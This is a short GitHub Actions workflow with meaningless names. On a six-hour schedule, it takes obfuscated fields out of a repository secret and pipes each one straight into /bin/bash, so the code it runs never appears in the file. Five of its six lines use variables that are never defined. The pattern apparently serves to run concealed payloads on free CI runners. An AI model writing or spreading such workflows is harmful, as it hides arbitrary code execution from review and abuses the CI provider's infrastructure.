name: dengshiming7654

on:
  workflow_dispatch:
  schedule:
    - cron: '2 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dengshiming7654
        env:
          iv7: ${{ secrets.iv7 }}
        run: |
          echo $iv7 | jq -r .bxf3573 | /bin/bash
          echo $xbqqm47 | jq -r .ockc0644 | /bin/bash
          echo $y51 | jq -r .dfku64 | /bin/bash
          echo $esc32 | jq -r .mpzw363 | /bin/bash
          echo $mopby1912 | jq -r .n12537 | /bin/bash
          echo $gnssy56 | jq -r .kj29636 | /bin/bash

